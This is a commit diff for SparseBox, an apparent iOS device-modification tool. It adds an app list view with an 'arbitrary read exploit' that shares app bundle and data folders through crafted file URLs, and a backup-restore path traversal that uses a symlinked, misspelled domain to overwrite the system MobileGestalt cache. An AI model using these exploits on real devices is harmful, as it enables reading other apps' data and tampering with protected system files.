Add app list viewer and share sheet exploit

Author: khanhduytran0

Makefile

@@ -34,30 +34,7 @@ SparseBox_FILES = \
   include/minimuxer.swift \
   include/em_proxy.swift \
   include/SwiftBridgeCore.swift \
-  Sources/AnyCodable/AnyCodable.swift \
-  Sources/AnyCodable/AnyDecodable.swift \
-  Sources/AnyCodable/AnyEncodable.swift \
-  Sources/SparseRestore/MBDB.swift \
-  Sources/SparseRestore/Backup.swift \
-  Sources/SparseRestore/Restore.swift \
-  Sources/LogView.swift \
-  Sources/MyApp.swift \
-  Sources/MobileDevice/MobileDevice.swift \
-  Sources/SwiftNIO/NIOFoundationCompat/ByteBuffer-foundation.swift \
-  Sources/SwiftNIO/_NIOBase64/Base64.swift \
-  Sources/SwiftNIO/NIOCore/ByteBuffer-lengthPrefix.swift \
-  Sources/SwiftNIO/NIOCore/ByteBuffer-conversions.swift \
-  Sources/SwiftNIO/NIOCore/IntegerTypes.swift \
-  Sources/SwiftNIO/NIOCore/ByteBuffer-multi-int.swift \
-  Sources/SwiftNIO/NIOCore/ByteBuffer-views.swift \
-  Sources/SwiftNIO/NIOCore/ByteBuffer-hexdump.swift \
-  Sources/SwiftNIO/NIOCore/IntegerBitPacking.swift \
-  Sources/SwiftNIO/NIOCore/ByteBuffer-aux.swift \
-  Sources/SwiftNIO/NIOCore/ByteBuffer-core.swift \
-  Sources/SwiftNIO/NIOCore/CircularBuffer.swift \
-  Sources/SwiftNIO/NIOCore/ByteBuffer-int.swift \
-  Sources/SwiftNIO/NIOPosix/PointerHelpers.swift \
-  Sources/ContentView.swift
+  $(shell find Sources -type f -name "*.swift")
 SparseBox_FRAMEWORKS = UIKit
 SparseBox_CFLAGS = -fcommon -fobjc-arc
 SparseBox_SWIFTFLAGS = -Iinclude -import-objc-header include/minimuxer-Bridging-Header.h

README.md

@@ -15,5 +15,6 @@ Before opening SparseBox, you have to close SideStore from app switcher. This is
 - @SideStore: em_proxy and minimuxer
 - @JJTech0130: SparseRestore and backup exploit
 - @PoomSmart: MobileGestalt dump
+- @Lakr233: BBackupp
 - @libimobiledevice
 - [the sneakyf1shy apple intelligence tutorial](https://gist.github.com/f1shy-dev/23b4a78dc283edd30ae2b2e6429129b5#file-best_sae_trick-md)

Sources/AppListView.swift

@@ -0,0 +1,83 @@
+import SwiftUI
+
+struct AppItemView: View {
+    let appDetails: [String : AnyCodable]
+    var body: some View {
+        Form {
+            Section {
+                ForEach(Array(appDetails.keys), id: \.self) { k in
+                    let v = appDetails[k]?.value as? String
+                    Text(k)
+                        .badge("\(v ?? "(null)" )")
+                        .textSelection(.enabled)
+                }
+            }
+            Section {
+                if let bundlePath = appDetails["Path"] {
+                    ShareLink(item: URL(string: "file://a\(bundlePath)")!) {
+                        Text("Share app bundle folder")
+                    }
+                }
+                if let containerPath = appDetails["Container"] {
+                    ShareLink(item: URL(string: "file://a\(containerPath)")!) {
+                        Text("Share app data folder")
+                    }
+                }
+            } header: {
+                Text("Arbitrary read exploit")
+            } footer: {
+                Text("Only supported on iOS 18.2b2 and older. For this exploit, folders can only be shared via AirDrop.\nIf you're sharing App Store apps, please note that it will still be encrypted.")
+            }
+        }
+    }
+}
+
+struct AppListView: View {
+    @State var apps: [String : AnyCodable] = [:]
+    @State var searchString: String = ""
+    var results: [String] {
+        Array(searchString.isEmpty ? apps.keys : apps.filter {
+            let appDetails = $0.value.value as? [String: AnyCodable]
+            let appName = (appDetails!["CFBundleName"]?.value as! String?)!
+            let appPath = (appDetails!["Path"]?.value as! String?)!
+            return appName.contains(searchString) || appPath.contains(searchString)
+        }.keys)
+    }
+    var body: some View {
+        List {
+            ForEach(results, id: \.self) { bundleID in
+                let value = apps[bundleID]
+                let appDetails = value?.value as? [String: AnyCodable]
+                let appImage = appDetails!["PlaceholderIcon"]?.value as! Data?
+                let appName = (appDetails!["CFBundleName"]?.value as! String?)!
+                let appPath = (appDetails!["Path"]?.value as! String?)!
+                NavigationLink {
+                    AppItemView(appDetails: appDetails!)
+                } label: {
+                    Image(uiImage: UIImage(data: appImage!)!)
+                        .resizable()
+                        .frame(width: 40, height: 40)
+                    VStack(alignment: .leading) {
+                        Text(appName)
+                        Text(appPath).font(Font.footnote)
+                    }
+                }
+            }
+        }
+        .onAppear {
+            if apps.count == 0 {
+                Task {
+                    let deviceList = MobileDevice.deviceList()
+                    guard deviceList.count == 1 else {
+                        print("Invalid device count: \(deviceList.count)")
+                        return
+                    }
+                    let udid = deviceList.first!
+                    apps = MobileDevice.listApplications(udid: udid)!
+                }
+            }
+        }
+        .searchable(text: $searchString)
+        .navigationTitle("App list")
+    }
+}

Sources/ContentView.swift

@@ -54,6 +54,9 @@ struct ContentView: View {
                     }
                 }
                 Section {
+                    Button("List installed apps") {
+                        testListApps()
+                    }
                     Button("Bypass 3 app limit") {
                         testBypassAppLimit()
                     }
@@ -159,8 +162,10 @@ Thanks to:
             .navigationDestination(for: String.self) { view in
                 if view == "ApplyChanges" {
                     LogView(mbdb: mbdb!, reboot: reboot)
-                } else if view == "BypassAppLimit" {
+                } else if view == "ApplyNoReboot" {
                     LogView(mbdb: mbdb!, reboot: false)
+                } else if view == "ListApps" {
+                    AppListView()
                 }
             }
             .navigationTitle("SparseBox")
@@ -194,13 +199,13 @@ Thanks to:
         let origMethod = class_getInstanceMethod(UIDocumentPickerViewController.self, #selector(UIDocumentPickerViewController.init(forOpeningContentTypes:asCopy:)))!
         method_exchangeImplementations(origMethod, fixMethod)
     }
-    
+
     func testBypassAppLimit() {
         Task {
             taskRunning = true
             if ready() {
                 mbdb = Restore.createBypassAppLimit()
-                path.append("BypassAppLimit")
+                path.append("ApplyNoReboot")
             } else {
                 lastError = "minimuxer is not ready. Ensure you have WiFi and WireGuard VPN set up."
                 showErrorAlert.toggle()
@@ -209,11 +214,21 @@ Thanks to:
         }
     }
 
+    func testListApps() {
+        if ready() {
+            path.append("ListApps")
+        } else {
+            lastError = "minimuxer is not ready. Ensure you have WiFi and WireGuard VPN set up."
+            showErrorAlert.toggle()
+        }
+    }
+    
     func applyChanges() {
         Task {
             taskRunning = true
             if ready() {
-                mbdb = Restore.createBackupFiles(files: generateFilesToRestore())
+                mbdb = Restore.createMobileGestalt(file: FileToRestore(from: modMGURL, to: URL(filePath: "/var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library/Caches/com.apple.MobileGestalt.plist"), owner: 501, group: 501))
+                //Restore.createBackupFiles(files: generateFilesToRestore())
                 path.append("ApplyChanges")
             } else {
                 lastError = "minimuxer is not ready. Ensure you have WiFi and WireGuard VPN set up."

Sources/MobileDevice/MobileDevice.swift

@@ -145,10 +145,13 @@ class MobileDevice {
         requireInstallProxyService(device: device) { inst_client in
             guard let inst_client else { return }
             let options: [String: Any] = [
-                "ApplicationType": "User",
+                //"ApplicationType": "User",
                 "ReturnAttributes": [
+                    "ApplicationType",
                     "CFBundleIdentifier",
+                    "CFBundleName",
                     "Path",
+                    "Container"
                 ],
             ]
             let data = try! PropertyListEncoder().encode(AnyCodable(options))

Sources/SparseRestore/Restore.swift

@@ -1,5 +1,11 @@
 import Foundation
 
+enum PathTraversalCapability: Int {
+    case unsupported = 0 // 18.2b3+, 17.7.2
+    case dotOnly // 18.1b5-18.2b2, 17.7.1
+    case dotAndSlashes // up to 18.1b4, 17.7
+}
+
 class FileToRestore {
     var contents: Data
     var to: URL
@@ -21,6 +27,14 @@ class FileToRestore {
 }
 
 struct Restore {
+    static func supportedExploitLevel() -> PathTraversalCapability {
+        if #available(iOS 18.1, *) {
+            return .dotOnly
+        } else {
+            return .dotAndSlashes
+        }
+    }
+    
     static func createBypassAppLimit() -> Backup {
         let deviceList = MobileDevice.deviceList()
         guard deviceList.count == 1 else {
@@ -53,6 +67,21 @@ struct Restore {
         return Backup(files: files)
     }
 
+    static func createMobileGestalt(file: FileToRestore) -> Backup {
+        Backup(files: [
+            Directory(path: "", domain: "SysSharedContainerDomain-systemgroup.com.apple.mobilegestaltcachf"),
+            Directory(path: "Library", domain: "SysSharedContainerDomain-systemgroup.com.apple.mobilegestaltcachf"),
+            Directory(path: "Library/Caches", domain: "SysSharedContainerDomain-systemgroup.com.apple.mobilegestaltcachf"),
+            ConcreteFile(
+                path: "Library/Caches/com.apple.MobileGestalt.plist",
+                domain: "SysSharedContainerDomain-systemgroup.com.apple.mobilegestaltcachf",
+                contents: file.contents,
+                owner: file.owner,
+                group: file.group),
+            SymbolicLink(path: "", domain: "SysSharedContainerDomain-systemgroup.com.apple.mobilegestaltcache", target: "systemgroup.com.apple.mobilegestaltcachf")
+        ])
+    }
+    
     static func createBackupFiles(files: [FileToRestore]) -> Backup {
         // create the files to be backed up
         var filesList : [BackupFile] = [